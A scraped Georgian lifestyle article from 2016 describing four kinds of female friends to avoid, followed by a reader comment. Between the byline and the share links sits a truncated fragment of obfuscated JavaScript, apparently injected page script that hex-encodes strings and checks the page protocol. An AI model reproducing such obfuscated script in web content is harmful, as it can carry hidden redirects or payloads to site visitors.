07 მაისი, 2016
დაქალები, რომლებიც არ გჭირდებათ - მათგან თავი შორს დაიჭირეთ
შურიანი

ერთგული მეგობარი და ყველანაირ ურთიერთობაში კარგი ადამიანია, მაგრამ შური ყველაფერს ანადგურებს. ზიანს არ მოგაყენებს და ცხოვრებას არ დაგინგრევს, უბრალოდ მთელი ძალით ისწრაფვის მიიღოს ის, რაც შენ გაქვს და ამას აუცილებლად მიაღწევს. სინამდვილეში ეს ყველაფერი არ სჭირდება, მაგრამ როცა მიაღწევს, დამნაშავე შენ იქნები. რატომ? ასეთ მეგობარს, სჯობს, ყოველგვარი კითხვების გარეშე დაემშვიდობო.

ეგოისტი

სწორედ ეს პიროვნება იქნება შენს გვერდით მუდამ, "ჭირსა თუ ლხინში". უცნაურია, არა?! მაგრამ ის შენს გვერდით არა შენ გამო, არამედ საკუთარი თავის გამოა.
მისგან კარგს ვერაფერს მიიღებ, სინამდვილეში მხოლოდ საკუთარ თავზე ფიქრობს.

მშველელი

ყოველთვის ყველაფერი ყველაზე უკეთ იცის და რჩევებს იძლევა, მიზეზით თუ უმიზეზოდ. შენ უყვები, რომ დასასვენებლად ზღვაზე წასვლას აპირებ, ის კი კეფირის დიეტას გირჩევს. ასეთ ადამიანს, ყველაზე მეტად სიამოვნებს, როცა მისი რჩევის გაუთვალისწინებლობის გამო საფრთხეში ვარდები, რადგან მაშინ შეუძლია გითხრას "ხომ გეუბნებოდი".

მუდმივი მსხვერპლი

ყოველთვის ცუდად არის, ყველა გულს ტკენს და მისი არავის ესმის. შენ კი მუდმივი მშველელის როლს ირგებ. ახლობლის დახმარება, რა თქმა უნდა, კარგი საქციელია, მაგრამ სასწრაფო დახმარება არ ხართ. და თუ მსხვერპლთან გულის გადაშლას მოისურვებთ, დამამშვიდებლელი და შეკვრა ხელსახოცი წინასწარ გაამზადეთ, რადგან ცერემონია ცრემლებისა და ჩივილის გარეშე არ ჩაივლის.

ანაბელ ლაჩოვსკი

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o ){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
FaceBook Twitter Google ელფოსტაბეჭდვა
კომენტარი / 1 /
მარი
შუბლზე არავის არაფერი არ აწერია და როგორ გავიგოთ ვინ რისთვისაა ჩვენს გვერდით.ესაა ევროპული მეთოდი და არა ქართული.იშვიათად თუ ნახავთ ისეთ დაქალებს ევროპაში,როგორებიც ქართველი დაქალები არიან...უმეტეს შემთხვევაში კი საერთოდ არა ყავთ,ვინაიდან ყავთ ოჯახის წევრები და მათ უყვებიან პრობლემებს და არა ვიღაცეებს...
21:03 / 07-05-2016
გამოხმაურება / 0 /
TOPS